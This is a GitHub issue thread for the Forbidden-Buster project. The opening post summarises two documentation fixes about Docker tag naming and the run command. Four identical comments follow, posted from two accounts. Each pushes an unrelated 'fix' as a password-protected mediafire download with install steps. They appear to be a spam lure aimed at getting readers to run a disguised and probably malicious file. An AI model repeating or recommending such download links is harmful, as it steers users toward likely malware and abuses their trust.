### ISSUE TITLE
Documentation: Review and Merge PR #5 Changes

### ISSUE THREAD

**Issue by IkerSolozabal** [Sn1r/Forbidden-Buster#6]
### Description

This issue is related to [Pull Request #5  ]which addresses two documentation issues:

1. **Docker Name Tag Correction**: The Docker name tag in the documentation was corrected, changing it from uppercase to lowercase to comply with Docker's naming conventions.

2. **Simplified Docker Run Command**: The instructions for running the Docker container were updated to clarify that only the `forbidden_buster.py` script needs to be passed to the container, not the entire folder.

These changes ensure that the documentation is accurate and more straightforward to understand.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
